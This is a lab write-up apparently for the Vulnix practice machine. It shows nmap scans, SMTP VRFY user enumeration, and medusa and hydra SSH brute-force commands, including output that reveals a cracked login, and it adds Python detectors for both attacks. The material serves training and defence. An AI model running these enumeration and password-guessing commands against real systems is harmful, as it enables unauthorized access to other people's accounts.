::: {.container}
::: {.post}
::: {.show-content}
HackLAB: Vulnix, Part 1 (Reconnaissance)
========================================
```text
nmap 192.168.1.109 -Pn -sV
22/tcp   open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp       Postfix smtpd
79/tcp   open  finger     Linux fingerd
110/tcp  open  pop3?
111/tcp  open  rpcbind    2-4 (RPC #100000)
143/tcp  open  imap       Dovecot imapd
512/tcp  open  exec       netkit-rsh rexecd
513/tcp  open  login      OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
993/tcp  open  ssl/imap   Dovecot imapd
995/tcp  open  ssl/pop3s?
2049/tcp open  nfs_acl    2-3 (RPC #100227)
```
Analysis: the host exposes a mail service (port 25, SMTP) and NFS (Network File System), among several other services. Ports like these are normally only reachable from inside the internal network. OS version: Linux 2.6.32 - 3.10.
Start a medusa brute-force first and let the wordlist run in the background; it does no harm while we probe the services for vulnerabilities. Wordlist download address:

```text
medusa -h 192.168.1.109 -U /root/Desktop/john.txt -P /root/Desktop/pass.txt -e ns -M ssh -t 10 -O ssh.log
```
After a while the brute-force had produced nothing useful.

Checking for weak credentials:

```text
nmap --script=auth 192.168.1.109
22/tcp open  ssh
| ssh-auth-methods:
|   Supported authentication methods:
|     publickey
|_    password
|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
25/tcp open  smtp
| smtp-enum-users:
|_  Method RCPT returned a unhandled status code.
```

Supported authentication methods: publickey and password. The latter is the traditional password login, which is what a wordlist attack targets.
SMTP (Simple Mail Transfer Protocol):

[Figure: SMTP protocol overview, taken from the book 《堆栈攻击：八层网络安全防御》 (*Stack Attack: Eight-Layer Network Security Defense*)]
nmap has a script that enumerates existing usernames over SMTP: https://nmap.org/nsedoc/scripts/smtp-enum-users.html

```text
nmap --script smtp-enum-users.nse -p 25 192.168.1.109
```

Result: Couldn't find any accounts

```text
nmap --script-args smtp-enum-users.methods={EXPN,RCPT,VRFY} -p 25 192.168.1.109
```

Result 2:

```text
Failed to resolve "smtp-enum-users.methods=RCPT".
Failed to resolve "smtp-enum-users.methods=VRFY".
Nmap scan report for 192.168.1.109
```

These errors come from the shell, not from nmap: the unquoted `{EXPN,RCPT,VRFY}` is brace-expanded into three separate arguments, so only the first one reaches `--script-args` and nmap treats the other two as hostnames to scan. The argument has to be quoted (`--script-args 'smtp-enum-users.methods={EXPN,RCPT,VRFY}'`), and the command also omits `--script smtp-enum-users`, without which the script arguments have nothing to act on.
Command analysis:

SMTP offers an extra feature: commands that check whether a username or mailing list exists, namely VRFY and EXPN.

VRFY checks whether a specific mail account exists on the system. If the server accepts the command, the account namespace can be enumerated by brute force.
```text
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.1.109
```
Enumeration results:

```text
192.168.1.109: ROOT exists
192.168.1.109: backup exists
192.168.1.109: bin exists
192.168.1.109: daemon exists
192.168.1.109: games exists
192.168.1.109: gnats exists
192.168.1.109: irc exists
192.168.1.109: libuuid exists
192.168.1.109: list exists
192.168.1.109: lp exists
192.168.1.109: mail exists
192.168.1.109: man exists
192.168.1.109: messagebus exists
192.168.1.109: news exists
192.168.1.109: nobody exists
192.168.1.109: postmaster exists
192.168.1.109: proxy exists
192.168.1.109: root exists
192.168.1.109: sshd exists
192.168.1.109: sync exists
192.168.1.109: sys exists
192.168.1.109: syslog exists
192.168.1.109: user exists
192.168.1.109: uucp exists
192.168.1.109: www-data exists
```
Verifying the result:

Checking by hand with the VRFY command: if the user exists the server replies with a 252 code, and if the user does not exist it replies with 550.
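From the defender's side, the same 252/550 distinction the walkthrough relies on is what makes a VRFY sweep easy to spot in a mail server's session log: one client issuing many VRFY commands in a row, most of them answered with 2xx codes. The following is an added example, not part of the original post or of smtp-user-enum. It runs over a constructed transcript in a simple `ip C: command` / `ip S: reply` format (assumed here, not any real server's log layout), classifies each reply by its RFC 5321 code, and flags clients that probe more than a threshold number of names. The 502 reply from the second client shows what a server with VRFY disabled (Postfix `disable_vrfy_command = yes`) returns instead.

```python
"""Classify SMTP VRFY replies and flag enumeration-style sessions.

Added example for this walkthrough; not part of the original post or of any
tool it mentions. The transcript below is constructed, and its line format
(client IP, then "C:" for commands and "S:" for server replies) is an
assumption of this example. Reply-code meanings follow RFC 5321:
252 = cannot VRFY the user but will accept mail for it, 550 = mailbox
unavailable, 502 = command not implemented (the reply of a server that
has VRFY disabled).
"""
import re
from collections import defaultdict

SAMPLE_TRANSCRIPT = """\
192.0.2.10 C: VRFY root
192.0.2.10 S: 252 2.0.0 root
192.0.2.10 C: VRFY backup
192.0.2.10 S: 252 2.0.0 backup
192.0.2.10 C: VRFY nosuchuser
192.0.2.10 S: 550 5.1.1 <nosuchuser>: Recipient address rejected: User unknown
192.0.2.10 C: VRFY www-data
192.0.2.10 S: 252 2.0.0 www-data
192.0.2.10 C: VRFY sshd
192.0.2.10 S: 252 2.0.0 sshd
198.51.100.7 C: VRFY postmaster
198.51.100.7 S: 502 5.5.1 VRFY command is disabled
"""

VRFY_CMD = re.compile(r"^(?P<ip>\S+) C: VRFY (?P<name>\S+)$")
VRFY_REPLY = re.compile(r"^(?P<ip>\S+) S: (?P<code>\d{3})\b")


def classify_reply(code: int) -> str:
    """Map an SMTP reply code to what it tells a prober about the name."""
    # 252 does not confirm the mailbox, but the server did not reject the
    # name, which is exactly the signal the enumeration in the walkthrough
    # uses; treat any 25x as a probable hit.
    if code in (250, 251, 252):
        return "probable"
    if code in (550, 551, 553):
        return "unknown"
    if code == 502:
        return "disabled"
    return "other"


def parse_transcript(text: str):
    """Pair each VRFY command with the next reply from the same client.

    Returns a list of (client_ip, probed_name, reply_code) tuples.
    """
    pending = {}  # client ip -> name whose reply is still outstanding
    events = []
    for line in text.splitlines():
        m = VRFY_CMD.match(line)
        if m:
            pending[m["ip"]] = m["name"]
            continue
        m = VRFY_REPLY.match(line)
        if m and m["ip"] in pending:
            name = pending.pop(m["ip"])
            events.append((m["ip"], name, int(m["code"])))
    return events


def find_enumerators(events, threshold=3):
    """Return {client_ip: probe_count} for clients at or above the threshold."""
    counts = defaultdict(int)
    for ip, _, _ in events:
        counts[ip] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def probable_accounts(events):
    """Names the server did not reject, grouped by the probing client."""
    hits = defaultdict(list)
    for ip, name, code in events:
        if classify_reply(code) == "probable":
            hits[ip].append(name)
    return dict(hits)


if __name__ == "__main__":
    ev = parse_transcript(SAMPLE_TRANSCRIPT)
    accounts = probable_accounts(ev)
    for ip, n in find_enumerators(ev).items():
        print(f"{ip}: {n} VRFY probes, names not rejected: {accounts.get(ip, [])}")
```

Only the first client crosses the threshold; the second one received a 502, which is the behaviour to aim for on a production MTA, since a disabled VRFY leaks nothing regardless of how many names are tried.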
SSH brute force:

Brute forcing really comes down to the wordlist plus luck. I cheated here, em..........… without cheating, every username collected above should go into a wordlist.

```text
hydra -l user -P /root/Desktop/pass.txt 192.168.1.109 ssh -t 4
```

Result:

```text
[DATA] attacking ssh://192.168.1.109:22/
[22][ssh] host: 192.168.1.109  login: user  password: letmein
1 of 1 target successfully completed, 1 valid password found
```
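A password-guessing run like the hydra and medusa sessions above leaves a very recognisable trace in the target's `auth.log`: a burst of `Failed password` lines from one source address, sometimes followed by an `Accepted password` for the same address, which is the sign that a credential was guessed rather than typed. The following is an added example, not part of the original post or of either tool: a sliding-window detector over constructed sshd log lines in the standard OpenSSH syslog format. The `year` parameter is an assumption of the example, needed because syslog timestamps carry no year.

```python
"""Sliding-window detector for SSH password guessing in sshd logs.

Added example for this walkthrough, not part of the original post or of
hydra/medusa. The log lines are constructed in the usual OpenSSH syslog
format ("Failed password for ..." / "Accepted password for ..."). The year
passed to parse_line is an assumption, since syslog timestamps omit it.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_LOG = """\
Mar  3 10:00:01 vulnix sshd[1201]: Failed password for user from 192.0.2.10 port 40110 ssh2
Mar  3 10:00:01 vulnix sshd[1202]: Failed password for user from 192.0.2.10 port 40112 ssh2
Mar  3 10:00:02 vulnix sshd[1203]: Failed password for invalid user admin from 192.0.2.10 port 40114 ssh2
Mar  3 10:00:02 vulnix sshd[1204]: Failed password for user from 192.0.2.10 port 40116 ssh2
Mar  3 10:00:03 vulnix sshd[1205]: Failed password for user from 192.0.2.10 port 40118 ssh2
Mar  3 10:00:04 vulnix sshd[1206]: Accepted password for user from 192.0.2.10 port 40120 ssh2
Mar  3 10:05:00 vulnix sshd[1300]: Failed password for root from 198.51.100.7 port 51000 ssh2
Mar  3 10:30:00 vulnix sshd[1301]: Accepted publickey for alice from 203.0.113.5 port 60000 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_line(line, year=2020):
    """Parse one sshd auth line; returns a dict or None for unrelated lines."""
    m = LINE.match(line)
    if not m:
        return None
    # syslog timestamps have no year, so one is supplied (assumed value).
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, max_failures=5, window_seconds=60):
    """Flag source IPs with >= max_failures failed logins inside the window.

    Returns {ip: {"failures": peak_count_in_window,
                  "success_after": user if a later login from that ip
                  succeeded, else None}}.
    """
    recent = defaultdict(deque)  # ip -> timestamps of failures in the window
    flagged = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["ip"]]
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            # drop failures that have slid out of the window
            while q and (ev["ts"] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= max_failures:
                entry = flagged.setdefault(ev["ip"],
                                           {"failures": 0, "success_after": None})
                entry["failures"] = max(entry["failures"], len(q))
        elif ev["ip"] in flagged:
            # a success from an already-flagged source: credential likely guessed
            flagged[ev["ip"]]["success_after"] = ev["user"]
    return flagged


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failures in window, "
              f"login succeeded afterwards as: {info['success_after']}")
```

With the default threshold only the first address is flagged, and the record shows the `user` login that succeeded right after the burst; the single failure from the second address and the key-based login from the third are left alone. This is the same logic tools like fail2ban apply before blocking a source, and the `success_after` field is the one worth paging on.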